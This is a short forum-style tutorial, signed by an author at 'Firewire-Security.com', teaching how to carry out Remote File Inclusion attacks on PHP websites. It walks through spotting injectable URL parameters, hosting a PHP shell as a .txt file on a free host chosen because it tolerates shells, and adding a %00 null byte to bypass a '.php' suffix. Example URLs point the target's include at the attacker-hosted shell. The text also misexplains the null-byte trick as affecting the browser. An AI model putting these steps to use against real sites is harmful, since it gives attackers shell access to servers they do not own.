Remote File Inclusion is a common attack allowing an attack to include a script from another website, often php shell scripts, to give them shell access to the target server enabling them to compromise the server further. This is vulnerable when a php script include isnt declared correctly. In this tutorial i will be showing how to carry out a Remote File Inclusion attack.
Step 1
When looking for a Remote file Inclusion vulnerability in a website, you have to find a page that ends in something=4 or something=[string]. For example www.site.com/page=5
Alternatively if you are carrying an RFI from a prewritten exploit you will be given the variable at the end of the url so you dont have to look yourself.
Step 2
Register a free webhosting account to upload your shell to, i recommend http://www.7host.com as its fast, free and they allow you to upload shells without closing your account. IMPORTANT: Upload your file as a .txt file rather than .php or the attack will not work. Step 3
Once you have succesfully uploaded your shell, simply add it to the end of the url after the = sign. For example: www.site.com/page=http://username.7host ... script.txt Your shell script should now be working as if it were a php file and the RFI attack has been successful.
Step 3
In this section we will be showing an advanced technique to bypass php filters. In some scripts there is a bit of code: include $page.'.php'; As you can see it requires .php on the end of the url. You may think you can simply upload the shell as a .php and it will work, but instead this will come up as an error page, so do the same as before will a .txt shell script. But instead add a null byte %00 to the end of the url. For example: www.site.com/page=www.username.7host/shellscript.txt%00 This will be successful and show your shell link because it tells the browser to stop reading after the null byte. Tutorial written by Xinapse at Firewire-Security.com I do not give permission to copy this without pming me first.